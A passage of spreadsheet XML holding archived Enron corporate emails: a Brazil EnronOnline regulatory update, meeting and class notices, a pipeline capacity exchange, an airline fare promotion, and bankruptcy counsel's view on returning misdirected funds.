selling power in Brazil must be ECE (the Enron entity authorized by MAE)._x000D_
_x000D_
Thanks and Regards,_x000D_
_x000D_
Sami_x000D_
_x000D_
---------------------- Forwarded by Sami Arap/SA/Enron on 09/13/2000 10:35 AM _x000D_
---------------------------_x000D_
_x000D_
_x000D_
Andrea Bertone_x000D_
08/15/2000 12:43 PM_x000D_
To: Mark Taylor/HOU/ECT@ECT_x000D_
cc: Remi Collonges/SA/Enron@Enron, Ricardo Lisboa/SA/Enron@Enron, Sami _x000D_
Arap/SA/Enron@Enron _x000D_
_x000D_
Subject: Re: EnronOnline  _x000D_
_x000D_
Mark: _x000D_
_x000D_
Implementation of the EOL project in Brazil had been postponed for a while _x000D_
because of regulatory matters. The Market Rules were still being discussed _x000D_
and had not been approved by ANEEL, making it impossible for us to implement _x000D_
EOL, from a regulatory standpoint. Recently (about a couple of weeks ago), _x000D_
ANEEL issued Resolution 290/00, approving the Market Rules, subject to _x000D_
certain amendments. The amendments will be implemented in stages over the _x000D_
course of the next few years. After Resolution 290 was issued and the _x000D_
regulatory issues were partially resolved, the EOL team decided to work on _x000D_
the project again. I am now in the course of adapting the ETA, GTC and _x000D_
Password Application for use in Brazil. I will probably have drafts for _x000D_
comments within the next 10 days. I am not sure about the time estimate for _x000D_
completion of the project as a whole. I believe Remi can give you a better _x000D_
idea of the schedule._x000D_
_x000D_
I will forward to you in a separate e-mail the legal opinion that we received _x000D_
from outside counsel, addressing the issues in the memo prepared by your _x000D_
team. Also, I take the opportunity to let you know that I am leaving Enron by _x000D_
the end of August. From September on, the contact people for the EOL project _x000D_
will be Remi and Ricardo on the commercial side, and Sami Arap on the legal. _x000D_
In the meantime, please feel free to contact me if I can be of any further _x000D_
assistance._x000D_
_x000D_
Andrea_x000D_
_x000D_
_x000D_
From: Mark Taylor@ECT on 08/14/2000 05:57 PM CDT_x000D_
To: Andrea Bertone/SA/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: EnronOnline_x000D_
_x000D_
Any progress on the EnronOnline front?  I'm getting questions from the EOL _x000D_
team in Houston as to our time estimate to completion and wondered if you had _x000D_
heard back from outside counsel._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 12:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'neil.davies@enron.com', 'john.arnold@enron.com', 'pierre.aury@enron.com', 'george.mcclellan@enron.com', 'stephen.douglas@enron.com', 'jonathan.whitehead@enron.com', 'scott.vonderheide@enron.com', 'sally.beck@enron.com', 'stuart.staley@enron.com', 'chris.mahoney@enron.com', 'gary.hickerson@enron.com', 'cindy.skinner@enron.com', 'cathy.phillips@enron.com', 'lisa.yoho@enron.com', 'shanna.funkhouser@enron.com', 'beth.perlman@enron.com', 'scott.tholan@enron.com', 'per.sekse@enron.com', 'mark.frevert@enron.com', 'rick.bergsieker@enron.com', 'thomas.myers@enron.com', 'jeffrey.shankman@enron.com', 'brent.price@enron.com', 'mike.mcconnell@enron.com', 'doug.arnell@enron.com', 'mark.tawney@enron.com', 'michael.patrick@enron.com', 'larry.lawyer@enron.com', 'john.nowlan@enron.com', 'vince.kaminski@enron.com', 'alan.aronowitz@enron.com', 'eric.gonzales@enron.com', 'daniel.reck@enron.com', 'chris.gaskill@enron.com'})</t>
  </si>
  <si>
    <t>PIRA Global Oil and Natural Outlooks- Save these dates.</t>
  </si>
  <si>
    <t>_x000D_
PIRA is coming in May to do their semi-annual energy outlook._x000D_
_x000D_
Greg Shuttlesworth- North American Natural Gas --- May 14th 3-5 pm (30 C1)_x000D_
?	New Production Outlook_x000D_
?	Price Direction_x000D_
?	Demand Fundamentals_x000D_
_x000D_
Dr. Gary Ross - World Oil Outlook --- May 16th 7-8:30 am --32C2_x000D_
?	OIl/ Demand/ supply Outlook_x000D_
?	Regional balances_x000D_
?	OPEC Rhetoric_x000D_
_x000D_
Jen Fraser_x000D_
34759</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 06:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ashley.streetman@exult.net'})</t>
  </si>
  <si>
    <t>apt.</t>
  </si>
  <si>
    <t>Hi Ashley!  A couple of things.  First of all, my new renter, Doug, wonders _x000D_
whether he can just call the utilities &amp; phone and transfer from his name to _x000D_
yours (rather than you cancelling and him having to pay any re-hookup fees _x000D_
that may apply).   I don't know how it would work; maybe he could conference _x000D_
you in when he makes the calls.  For what it is worth, he is a very nice guy _x000D_
to deal with, but it is totally up to you and I really don't care one way or _x000D_
the other. _x000D_
_x000D_
Also, I'm having someone come clean the place so you needn't worry about it, _x000D_
in case you were wondering.  I will take care of it (it looks pretty clean _x000D_
anyway!).  _x000D_
_x000D_
Please let me know your new address and I will send you your deposit refund _x000D_
next week._x000D_
_x000D_
Merci!_x000D_
_x000D_
Susan</t>
  </si>
  <si>
    <t>Wed, 31 Jan 2001 08:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Caulfield</t>
  </si>
  <si>
    <t>I liked him alot. Seems ready, willing and able to make a move. What are your _x000D_
thoughts? Rick</t>
  </si>
  <si>
    <t>Tue, 19 Dec 2000 07:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'morris.j@ei.com'})</t>
  </si>
  <si>
    <t>Re: Data</t>
  </si>
  <si>
    <t xml:space="preserve">Your statement is correct.  We are fully subscribed on our mainline going _x000D_
west.  EB_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
John Morris &lt;morris.j@ei.com&gt; on 12/19/2000 02:50:46 PM_x000D_
To: Elizabeth.Brown@enron.com_x000D_
cc: Frazier.King@enron.com, Shelley.Corman@enron.com, Linda.Trevino@enron.com _x000D_
_x000D_
Subject: Re: Data_x000D_
_x000D_
_x000D_
Thank you for the response.  Would it be fair to say that all the capacity to_x000D_
California and Arizona is fully subscribed?   Thanks.  --jrm_x000D_
_x000D_
Elizabeth.Brown@enron.com wrote:_x000D_
_x000D_
&gt; John,_x000D_
&gt;_x000D_
&gt; With regard to your first question, yes there are additional design_x000D_
&gt; capacities to be considered. The Topock lateral, which consists of the_x000D_
&gt; three Topock points listed, has a capacity of 400 MDth/d.  Additionally,_x000D_
&gt; the mainline capacity going west, which serves ALL of our markets in_x000D_
&gt; Arizona as well as California, is at 1090 MDth/d._x000D_
&gt;_x000D_
&gt; As for your second question, the data fields that were highlighted in red_x000D_
&gt; were more for my reference since these required some manual_x000D_
&gt; review/correction on my part._x000D_
&gt;_x000D_
&gt; If you need further information or explanation, please feel free to contact_x000D_
&gt; me._x000D_
&gt;_x000D_
&gt; Thanks,_x000D_
&gt; Elizabeth_x000D_
&gt;_x000D_
&gt; John Morris &lt;morris.j@ei.com&gt; on 12/19/2000 02:15:56 PM_x000D_
&gt;_x000D_
&gt; To:   Elizabeth Brown &lt;Elizabeth.Brown@enron.com&gt;_x000D_
&gt; cc:_x000D_
&gt;_x000D_
&gt; Subject:  Data_x000D_
&gt;_x000D_
&gt; Privileged &amp; Confidential_x000D_
&gt; Prepared for Counsel_x000D_
&gt;_x000D_
&gt; Elizabeth, thank you for responding so quickly.  I have two_x000D_
&gt; questions._x000D_
&gt; 1) You have total capacity of 1550 MDth/d into California._x000D_
&gt; Can TW simultaneously supply all these amounts, or is there_x000D_
&gt; some lower limit for total deliveries to all 4 meters?_x000D_
&gt; 2) Some of the "Type" cells are colored red.  Does the red_x000D_
&gt; have any meaning?_x000D_
&gt;_x000D_
&gt; Thank you, --JRM_x000D_
&gt;_x000D_
&gt; --_x000D_
&gt; John R. Morris_x000D_
&gt; Vice President_x000D_
&gt; Economists Incorporated_x000D_
&gt; 1200 New Hampshire Avenue, NW_x000D_
&gt; Suite 400_x000D_
&gt; Washington, DC  20036_x000D_
&gt; Voice: 202.223.4700_x000D_
&gt; Fax:   202.296.7138_x000D_
&gt;_x000D_
&gt; ***************************************************_x000D_
&gt; This e-mail, and any attachments thereto, is intended only_x000D_
&gt; for use by the addressee(s) named herein and may contain_x000D_
&gt; legally privileged and/or confidential information.  If you_x000D_
&gt; are not the intended recipient of this e-mail, you are_x000D_
&gt; hereby notified that any dissemination,distribution or_x000D_
&gt; copying of this e-mail, and any attachments thereto, is_x000D_
&gt; strictly prohibited. If you have received this e-mail in_x000D_
&gt; error, please immediately notify me at (202) 223-4700 and_x000D_
&gt; permanently delete the original and any copy of any e-mail_x000D_
&gt; and any printout thereof._x000D_
&gt; ***************************************************_x000D_
&gt;_x000D_
&gt; &lt;]_x000D_
_x000D_
--_x000D_
John R. Morris_x000D_
Vice President_x000D_
Economists Incorporated_x000D_
1200 New Hampshire Avenue, NW_x000D_
Suite 400_x000D_
Washington, DC  20036_x000D_
Voice: 202.223.4700_x000D_
Fax:   202.296.7138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distribution or copying_x000D_
of this e-mail, and any attachments thereto, is strictly prohibited. If you_x000D_
have received this e-mail in error, please immediately notify me at (202)_x000D_
223-4700 and permanently delete the original and any copy of any e-mail and _x000D_
any_x000D_
printout thereof._x000D_
***************************************************_x000D_
_x000D_
_x000D_
&lt;]_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sat, 17 Feb 2001 23:03:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ernie@enron.com'})</t>
  </si>
  <si>
    <t>Development Center Class Reminder  - Harassment Avoidance</t>
  </si>
  <si>
    <t>You are scheduled to attend: _x000D_
_x000D_
Harassment Avoidance_x000D_
Class Days and Times:_x000D_
  2/23/2001  02:45:00 PM - 04:15:00 PM_x000D_
Room # &amp; Location: DoubleTree-La Salle B,  Houston_x000D_
Participant Fee: $ 50_x000D_
Note: _x000D_
_x000D_
If you are unable to attend this class, the registration must be canceled by _x000D_
5:00 p.m. on  February 23, 2001 to prevent a charge of $ 50 to your RC _x000D_
number.  _x000D_
_x000D_
 We look forward to seeing you at 02:45:00 PM on February 23, 2001.  Please _x000D_
call the Development Center Team at 713-853-0357 if you have any questions._x000D_
_x000D_
 Thank you.</t>
  </si>
  <si>
    <t>Tue, 19 Sep 2000 08:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Financial Power Trades through 9/18/00</t>
  </si>
  <si>
    <t>Bob:  attached is Melissa's update.  She cannot meet this afternoon but we _x000D_
can grab her in the morning.  Are you flexible in the a.m.?  SS_x000D_
----- Forwarded by Sara Shackleton/HOU/ECT on 09/19/2000 03:43 PM -----_x000D_
_x000D_
	Melissa Ann Murphy_x000D_
	09/19/2000 11:49 AM_x000D_
		 _x000D_
		 To: Sara Shackleton/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Fiancial Power Trades through 9/18/00_x000D_
_x000D_
       _x000D_
_x000D_
I have updated the above documents._x000D_
_x000D_
Thanks,_x000D_
Melissa</t>
  </si>
  <si>
    <t>Wed, 14 Nov 2001 19:20:18 -0800 (PST)</t>
  </si>
  <si>
    <t>GMAT Review available at Enron</t>
  </si>
  <si>
    <t>_x000D_
GMAT REVIEW AT ENRON_x000D_
_x000D_
The next GMAT review course at Enron will begin Monday, November 26th:_x000D_
The schedule is:_x000D_
     Course # 7019-00:  Monday nights, Nov 26 - Jan 28 (no class Dec 24 or_x000D_
Dec 31)_x000D_
_x000D_
This course is identical to the courses that started in October.  It is_x000D_
being offered now for the benefit of employees who would like to take the_x000D_
GMAT before January 31 for the purposes of applying to business school._x000D_
_x000D_
Course details:_x000D_
     - Class is held at Enron in room ECN560 and is restricted to Enron_x000D_
		employees_x000D_
     - Each course is limited to eight students_x000D_
     - Meets once a week for eight weeks_x000D_
     - Hours are 6:00-9:00 PM (first session will run til 10:00 pm to_x000D_
          include initial exam)_x000D_
     - Expect 4-5 hours of homework per week_x000D_
     - Course includes a total of four practice GMAT exams_x000D_
     - Ends the second week of December, allowing employees to take the_x000D_
          GMAT in December and meet a January application deadline._x000D_
     - Special discount of $200 off the regular Princeton Review tuition_x000D_
_x000D_
Enron has allowed this program to be hosted in the Enron Building for_x000D_
convenience of its employees.  Individuals are responsible for paying their_x000D_
own fees.  Financial support from Enron is at manager's discretion and is_x000D_
subject to the usual tuition reimbursement constraints around budget and_x000D_
relevance to organizational performance._x000D_
_x000D_
_x000D_
HOW TO ENROLL:_x000D_
     1.  Print out the attached registration form._x000D_
     2.  Complete the form, but please note the following_x000D_
          SPECIFIC INSTRUCTIONS:_x000D_
          A.  Fill out the student information completely, including_x000D_
               your email address._x000D_
          B.  In the Enrollment section, where it says "Please enroll_x000D_
               me in GMAT Class Size-8 Course # _________",_x000D_
          C.  In the Payment section:  For the course at Enron, the_x000D_
               tuition is discounted by $200, to $899._x000D_
               FULL PAYMENT of this amount by credit or debit card is_x000D_
required on the registration form.  Be sure to indicate complete cardholder_x000D_
information._x000D_
     3.  Fax the completed form to Princeton Review at (713) 688-4746._x000D_
_x000D_
Faxes are time-stamped by the receiving fax machine at Princeton Review._x000D_
The first eight valid registration forms received for each course will be_x000D_
honored.  Registrations received after the first eight will be placed on a_x000D_
waiting_x000D_
list for the course or courses indicated.  Enrollments and waitlists will be_x000D_
confirmed by email._x000D_
_x000D_
Employees who are not able to take the course at Enron can take a course at_x000D_
the Princeton Review office at the same $200 discount.  _x000D_
Call (800)2REVIEW to register or to receive a list of course schedules._x000D_
_x000D_
IMPORTANCE OF THE GMAT:_x000D_
     The GMAT score is a critical part of your application to business_x000D_
school.  Indeed, in many cases, it is the single most decisive statistic_x000D_
that admissions offices use in evaluating applicants.  While work_x000D_
experience, GPA, essays, and interviews are all important components of_x000D_
your application, the GMAT is the one objective factor that you can_x000D_
substantially improve in a short period of time._x000D_
_x000D_
THE TEXAS MBA TOUR:_x000D_
     All interested Enron employees are invited to attend the Texas MBA_x000D_
Tour, which will be in Houston on Wednesday, January 23. The Texas MBA_x000D_
Tour, of which The Princeton Review is a partner, is a group of six business_x000D_
schools that host a joint MBA panel discussion and admissions fair.  The_x000D_
participating schools are Texas, Rice, SMU, Baylor, TCU, and Texas A&amp;M._x000D_
The Princeton Review has agreed to handle registration for the event, so_x000D_
call_x000D_
(800) 2REVIEW to register._x000D_
_x000D_
http://home.enron.com:84/messaging/gmatregform.pdf</t>
  </si>
  <si>
    <t>Wed, 18 Apr 2001 22:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Schedule Changes for April and May</t>
  </si>
  <si>
    <t>There were some schedule changes to april and may due to some training _x000D_
classes on the last weeekend in April.  If anyone has conflicts let me know _x000D_
or trade where possible._x000D_
_x000D_
ryan</t>
  </si>
  <si>
    <t>Fri, 30 Mar 2001 02:50:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'georgia.ward@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'tom.acton@enron.com', 'kirk.lenart@enron.com', 'scott.dozier@enron.com', 'gregg.lenart@enron.com', 'jason.vogler@enron.com', 'jack.mitchell@enron.com', 'megan.parker@enron.com', 'gloria.barkowsky@enron.com', 'sherry.anastas@enron.com', 'bob.fisher@enron.com', 'donna.greif@enron.com', 'john.couvillon@enron.com', 'cora.pendergrass@enron.com', 'edward.terry@enron.com', 'jeanne.wukasch@enron.com', 'jane.saladino@enron.com', 'doug.nelson@enron.com', 'bryce.baxter@enron.com', 'mark.mcclure@enron.com', 'anita.patton@enron.com', 'mark.mccoy@enron.com', 'charlene.richmond@enron.com', 'isabel.resendez@enron.com', 'pamela.chism@enron.com', 'shanna.boudreaux@enron.com', 'victor.lamadrid@enron.com', 'charles.howard@enron.com', 'natalie.baker@enron.com', 'charles.jacobs@enron.com', 'doug.wilkinson@enron.com', 'valerie.curtis@enron.com', 'rebecca.griffin@enron.com', 'tracy.wood@enron.com', 'shelly.mendel@enron.com', 'alfonso.trabulsi@enron.com', 'darla.saucier@enron.com', 'kimberly.vaughn@enron.com', 'tammy.gilmore@enron.com', 'priscilla.hamic@enron.com', 'lia.halstead@enron.com', 'shannon.groenewold@enron.com', 'howard.camp@enron.com', 'suzanne.christiansen@enron.com', 'eric.calub@enron.com', 'brenda.fletcher@enron.com', 'stacey.brewer@enron.com', 'clarissa.garcia@enron.com', 'lisa.valderrama@enron.com', 'sherlyn.schumack@enron.com', 'willie.stewart@enron.com', 'leslie.robinson@enron.com', 'christina.sanchez@enron.com', 'antoinette.beale@enron.com', 'wade.price@enron.com', 'marlo.james@enron.com', 'joanie.ngo@enron.com', 'mary.alba@enron.com', 'richard.pinion@enron.com', 'david.eubanks@enron.com', 'genaro.mendoza@enron.com', 'mary.comello@enron.com', 'alvin.thompson@enron.com', 'jacqueline.adams@enron.com', 'joe.casas@enron.com', 'lee.chance@enron.com', 'max.doner@enron.com', 'katherine.herrera@enron.com', 'scott.loving@enron.com', 'rosa.brown@enron.com', 'alton.honore@enron.com', 'joann.collins@enron.com', 'kevin.brady@enron.com', 'jennifer.pattison@enron.com', 'lashanda.poledore@enron.com', 'tamara.carter@enron.com', 'chris.ordway@enron.com', 'shahnaz.lakho@enron.com', 'robert.allwein@enron.com', 'ted.evans@enron.com', 'charles.muzzy@enron.com', 'linda.ewing@enron.com', 'joyce.viltz@enron.com', 'donnie.myers@enron.com', 'mary.ellenberger@enron.com', 'sabra.dinari@enron.com', 'vivien.pham@enron.com', 'hillary.mack@enron.com', 'mary.franklin@enron.com', 'mark.schrab@enron.com', 'jessica.white@enron.com', 'shirley.machleit@enron.com', 'willie.brooks@enron.com', 'daniel.lisk@enron.com', 'melanie.harwell@enron.com', 'larry.aguirre@enron.com', 'karen.lindley@enron.com', 'kimberly.olinger@enron.com', 'steve.gillespie@enron.com', 'cynthia.hakemack@enron.com', 'rita.wynne@enron.com', 'buddy.majorwitz@enron.com', 'tricia.truong@enron.com', 'jan.sutherland@enron.com', 'hakeem.ogunbunmi@enron.com', 'milton.bolanos@enron.com', 'suzanne.calcagno@enron.com', 'meredith.homco@enron.com', 'jesse.villarreal@enron.com', 'thu.nguyen@enron.com', 'shielah.castro@enron.com', 'cynthia.franklin@enron.com', 'jason.wolfe@enron.com', 'michael.mousteiko@enron.com', 'laurie.ellis@enron.com', 'ron.gaskey@enron.com', 'ryan.keith@enron.com', 'wes.dempsey@enron.com', 'audrey.cook@enron.com', 'christopher.spears@enron.com', 'pam.boxx@enron.com'})</t>
  </si>
  <si>
    <t>Unify Performance Testing Meeting</t>
  </si>
  <si>
    <t>When: Tuesday, April 03, 2001 2:00 PM-3:00 PM (GMT-06:00) Central Time (US &amp; _x000D_
Canada)._x000D_
Where: EB 30C1_x000D_
_x000D_
*~*~*~*~*~*~*~*~*~*_x000D_
_x000D_
_x000D_
Unify Performance Testing Meeting_x000D_
Tuesday April 3, 2001_x000D_
_x000D_
What: Purpose and details of the Unify performance testing_x000D_
_x000D_
When: Tuesday 04/03/01 2:00 - 2:30 Logistics_x000D_
      2:30 - 3:00 Vol. Mgmt. &amp; Settlements_x000D_
_x000D_
Where: EB 30C1_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Your attendance is encouraged and will be greatly appreciated!_x000D_
_x000D_
Georgia Ward_x000D_
ENW - Development Support - QA_x000D_
(713)853-9974</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 18:32:58 -0800 (PST)</t>
  </si>
  <si>
    <t>continental.com Specials for Elizabeth Sager</t>
  </si>
  <si>
    <t xml:space="preserve">continental.com Specials for Elizabeth Sager_x000D_
Wednesday, November 28, 2001_x000D_
****************************************_x000D_
_x000D_
AirTrain Newark Now Open_x000D_
_x000D_
Fast, safe, and dependable direct train service from Newark Airport to midtown Manhattan in less than 30 minutes._x000D_
_x000D_
Visit continental.com at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C%289zsve%7E%7Dzkw1l%7Exzm_zqmpq1%7Cpr9K9.A_x000D_
for more information._x000D_
_x000D_
_x000D_
TRAVEL UPDATES_x000D_
Be sure to check continental.com at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C%289zsve%7E%7Dzkw1l%7Exzm_zqmpq1%7Cpr9K9-A_x000D_
before leaving for the airport. We're looking forward to welcoming you onboard!_x000D_
_x000D_
_x000D_
****************************************_x000D_
TABLE OF CONTENTS_x000D_
1. This Week's Destinations_x000D_
2. Continental Vacations Offers_x000D_
3. Hilton Hotels &amp; Resorts, Doubletree Hotels &amp; Resorts, &amp; Embassy Suites Hotels Offers_x000D_
4. Alamo Rent A Car Offers_x000D_
5. National Car Rental Offers_x000D_
_x000D_
****************************************_x000D_
1. THIS WEEK'S DESTINATIONS_x000D_
_x000D_
Depart Saturday, December 1 and return on either Monday, December 3 or Tuesday, December 4, 2001. Please see the Terms and Conditions listed at the end of this e-mail._x000D_
_x000D_
Purchase continental.com Specials online until 11:59pm (CST) Friday at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C%289zsve%7E%7Dzkw1l%7Exzm_zqmpq1%7Cpr9K9%2CA_x000D_
You can also purchase continental.com Specials for an additional cost of $20 per ticket through our telephone service at 1-800-642-1617._x000D_
_x000D_
****************************************_x000D_
TRAVEL MAY ORIGINATE IN EITHER CITY_x000D_
****************************************_x000D_
_x000D_
****Roundtrip BETWEEN NEW YORK/NEWARK and:_x000D_
_x000D_
$119 - Ft. Lauderdale, FL_x000D_
$109 - Hartford, CT_x000D_
$109 - Manchester, NH_x000D_
$109 - Providence, RI_x000D_
_x000D_
_x000D_
********************************_x000D_
2. CONTINENTAL VACATIONS OFFERS_x000D_
_x000D_
5,000 OnePass Bonus Miles Just for Skiing!_x000D_
_x000D_
Enjoy the best of Colorado's white powder during ski season. Book a ski package for 5 nights or longer and you can earn 5,000 OnePass Bonus Miles on Continental Airlines._x000D_
_x000D_
For more information about this exciting offer, visit:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C%289zsve%7E%7Dzkw1l%7Exzm_zqmpq1%7Cpr9K9%2BA_x000D_
_x000D_
_x000D_
****************************************_x000D_
3. CONTINENTAL.COM SPECIALS FROM HILTON HOTELS AND RESORTS, DOUBLETREE_x000D_
HOTELS AND RESORTS, AND EMBASSY SUITES HOTELS_x000D_
_x000D_
The following rates are available December 1 - December 3, 2001 and are priced per night._x000D_
--------------------------------------_x000D_
Fort Lauderdale, FL - Hilton Fort Lauderdale Airport, Dania, FL. - $119_x000D_
_x000D_
Hartford, CT - Hilton Hartford, Hartford, CT. - $119_x000D_
_x000D_
Manchester, NH - Hilton Dedham Place, Dedham, MA. - $79_x000D_
_x000D_
Newark, NJ - Hilton Parsippany, Parsippany, NJ. - $89_x000D_
Newark, NJ - Doubletree Club Suites Jersey City, Jersey City, NJ. - $159_x000D_
_x000D_
New York, NY - Hilton New York, New York, NY. - $179/Night, 12/1-2_x000D_
_x000D_
To book this week's special rates for Hilton Family Hotels, visit and book at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C%289zsve%7E%7Dzkw1l%7Exzm_zqmpq1%7Cpr9K9*A_x000D_
Special rates apply only for the dates listed at each hotel and are subject to availability. Check hilton.com for specific dates at each Hilton Family Hotel. Or call at 1-800-774-1500 and ask for Value Rates. Restrictions apply to these rates._x000D_
_x000D_
_x000D_
********************************_x000D_
4. CONTINENTAL.COM SPECIALS FROM ALAMO RENT A CAR_x000D_
_x000D_
Rates listed below are valid on compact class vehicles at airport locations only. Other car types may be available. Rates are valid for rentals on Saturday, December 1 with returns Monday, December 3 or Tuesday, December 4, 2001._x000D_
-------------------------------_x000D_
$26 a day in:  Hartford, CT (BDL)_x000D_
$26 a day in:  Newark, NJ (EWR)_x000D_
$26 a day in:  Fort Lauderdale, FL (FLL)_x000D_
$26 a day in:  Providence, RI (PVD)_x000D_
_x000D_
To receive continental.com Specials discounted rates, simply make advance reservations and be sure to request ID # 596871 and Rate Code 33. Book your reservation online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C%289zsve%7E%7Dzkw1l%7Exzm_zqmpq1%7Cpr9K9%29A_x000D_
or contact Alamo at 1-800 GO ALAMO._x000D_
_x000D_
*If you are traveling to a city or a different date that is not listed, Alamo offers great rates when you book online at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C%289zsve%7E%7Dzkw1l%7Exzm_zqmpq1%7Cpr9K9%28A_x000D_
For complete details on these offers, please refer to Alamo's terms and conditions below._x000D_
_x000D_
_x000D_
****************************************_x000D_
6. CONTINENTAL.COM SPECIALS FROM NATIONAL CAR RENTAL_x000D_
_x000D_
Rates listed below are valid on intermediate class vehicles at airport locations only. Other car types may be available. Rates are valid for rentals on Saturday, December 1 with returns Monday, December 3 or Tuesday, December 4, 2001._x000D_
------------------------------------------_x000D_
$29 a day in:  Hartford, CT (BDL)_x000D_
$29 a day in:  Newark, NJ (EWR)_x000D_
$29 a day in:  Fort Lauderdale, FL (FLL)_x000D_
$21 a day in:  Manchester, NH (MHT)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3?%7C%7E1.%2C%289zsve%7E%7Dzkw1l%7Exzm_zqmpq1%7Cpr9K9%27A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3?%7C%7E1.%2C%289zsve%7E%7Dzkw1l%7Exzm_zqmpq1%7Cpr9K9%26A_x000D_
For complete details on these offers, please refer to National's terms and conditions below._x000D_
_x000D_
_x000D_
****************************************_x000D_
CONTINENTAL.COM SPECIALS RULES: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3?%7C%7E1.%2C%289zsve%7E%7Dzkw1l%7Exzm_zqmpq1%7Cpr9K9.%2FA_x000D_
_x000D_
_x000D_
ALAMO RENT A CAR'S TERMS AND CONDITIONS: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_x000D_
_x000D_
NATIONAL CAR RENTAL TERMS AND CONDITIONS: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_x000D_
_x000D_
---------------------------------------_x000D_
This e-mail message and its contents are copyrighted and are proprietary products of Continental Airlines, Inc. Any unauthorized use, reproduction, or transfer of the message or its content, in any medium, is strictly prohibited._x000D_
_x000D_
****************************************_x000D_
If you need assistance please visit:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C%289zsve%7E%7Dzkw1l%7Exzm_zqmpq1%7Cpr9K9..A_x000D_
View our privacy policy at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C%289zsve%7E%7Dzkw1l%7Exzm_zqmpq1%7Cpr9K9.-A_x000D_
_x000D_
This e-mail was sent to: elizabeth.sager@enron.com_x000D_
_x000D_
TO UNSUBSCRIBE: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3?%7C%7E1.%2C%289zsve%7E%7Dzkw1l%7Exzm_zqmpq1%7Cpr9K9.%2BA_x000D_
_x000D_
TO SUBSCRIBE:_x000D_
Please visit the continental.com Specials page on our web site at:_x000D_
http://continentalairlines.rsc01.net/servlet/cc3?%7C%7E1.%2C%289zsve%7E%7Dzkw1l%7Exzm_zqmpq1%7Cpr9K9.%2CA_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 22 Feb 2002 06:28:14 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: FW: AEP Refunds - Legal Opinion</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	melanie.gray@weil.com@ENRON  _x000D_
Sent:	Friday, February 22, 2002 12:54 AM_x000D_
To:	Gray, Barbara N._x000D_
Cc:	Denetsosie, Troy; brian.rosen@weil.com_x000D_
Subject:	Re: FW: AEP Refunds - Legal Opinion_x000D_
_x000D_
_x000D_
My view is that we cannot return this without court approval.  I assume_x000D_
that the funds paid into Company 1647, HPLR -- Division of 0058 were swept_x000D_
into Enron Corp.'s centralized cash accounts.  Given the cumulative size of_x000D_
these payments, I don't think we should go forward without court apporval._x000D_
_x000D_
Also, a financial examiner has just been appointed at ENA to review the_x000D_
cash management and cash flow between ENA and Corp.  I wouldn't want to_x000D_
allow this payment to go out right before the examiner gets started._x000D_
_x000D_
In addition, are we certain that Exxon doesn't owe ENA or Corp any amounts_x000D_
due and owing?  If it does, I think that further complicates the analysis._x000D_
_x000D_
Brian, if you disagree, let me know; but as it stands, we would need court_x000D_
approval to return these funds.  Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Gray, Barbara N." &lt;Barbara.N.Gray@ENRON.com&gt; on 02/20/2002 04:14:53 PM_x000D_
cc:    "Denetsosie, Troy" &lt;Troy.Denetsosie@ENRON.com&gt;_x000D_
Subject:    FW: AEP Refunds - Legal Opinion_x000D_
_x000D_
_x000D_
_x000D_
Melanie,  same request as prior email....Many thanks, Barbara_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From:     Denetsosie, Troy_x000D_
&gt; Sent:     Wednesday, February 20, 2002 3:22 PM_x000D_
&gt; To: Gray, Barbara N._x000D_
&gt; Cc: Sewell, Doug; Coffey Jr., Jim_x000D_
&gt; Subject:  RE: AEP Refunds - Legal Opinion_x000D_
&gt;_x000D_
&gt; Barbara,_x000D_
&gt;_x000D_
&gt; In reply, I send the following document which provides a summary of the_x000D_
Exxon misdirected funds._x000D_
&gt;_x000D_
&gt; &gt;  &lt;&lt;Exxon Refund Summary.doc&gt;&gt;_x000D_
&gt; Please contact me if you have further questions or require documentation._x000D_
&gt;_x000D_
&gt; Troy_x000D_
&gt;_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From:     Gray, Barbara N._x000D_
&gt; Sent:     Wednesday, February 20, 2002 1:46 PM_x000D_
&gt; To: Denetsosie, Troy_x000D_
&gt; Subject:  RE: AEP Refunds - Legal Opinion_x000D_
&gt;_x000D_
&gt; Troy, if you need an "opinion, I will need to forward all the facts_x000D_
related to the 2 transactions in question....please provide them separately_x000D_
via email and I will arrange for a Weil lawyer to opine on each situation._x000D_
Regards   bng_x000D_
&gt;_x000D_
&gt;      -----Original Message-----_x000D_
&gt;     From:       Denetsosie, Troy_x000D_
&gt;     Sent: Wednesday, February 20, 2002 10:42 AM_x000D_
&gt;     To:   Gray, Barbara N._x000D_
